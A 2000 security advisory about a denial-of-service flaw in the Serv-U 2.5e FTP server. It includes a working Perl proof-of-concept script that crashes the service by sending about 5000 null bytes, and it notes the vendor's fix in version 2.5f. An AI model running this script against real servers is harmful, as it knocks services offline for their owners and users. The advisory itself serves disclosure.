FTP Serv-U 2.5e Subject to Denial of Service

 

Reported August 7, 2000 by Blue Panda

VERSIONS EFFECTED
FTP Serv-U 2.5e

DESCRIPTION

The Serv-U FTP service can be made to generate stack faults by sending the service approximately 5000 null bytes. Such an attack could render the underlying operating system unstable where it may eventually crash.

DEMONSTRATION

#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#

use IO::Socket;

$host = "ftp.host.com";
$port = "21";

print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";

$counter = 0;
$buf = "";
while ($counter < 5000) \{
$buf .= "\x00";
$counter += 1;
\}
print $socket "$buf\n";

sleep(4);
close($socket);

VENDOR RESPONSE

The vendor, Deerfield, is aware of the problem and has released a patched version 2.5f.  

CREDIT
Discovered by Blue Panda

TAGS: Security
Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish